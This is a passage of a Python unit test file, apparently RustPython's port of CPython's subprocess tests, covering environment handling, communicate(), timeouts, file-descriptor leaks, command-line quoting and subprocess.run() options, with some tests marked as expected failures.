'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# TODO: RUSTPYTHON
@unittest.expectedFailure
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, hangs")
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_communicate_pipe_buf = unittest.expectedFailure(test_communicate_pipe_buf)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_universal_newlines_communicate = unittest.expectedFailure(test_universal_newlines_communicate)
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_universal_newlines_communicate_stdin_stdout_stderr = unittest.expectedFailure(test_universal_newlines_communicate_stdin_stdout_stderr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_bufsize_equal_one_text_mode = unittest.expectedFailure(test_bufsize_equal_one_text_mode)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_leaking_fds_on_error = unittest.expectedFailure(test_leaking_fds_on_error)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any argumenets that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
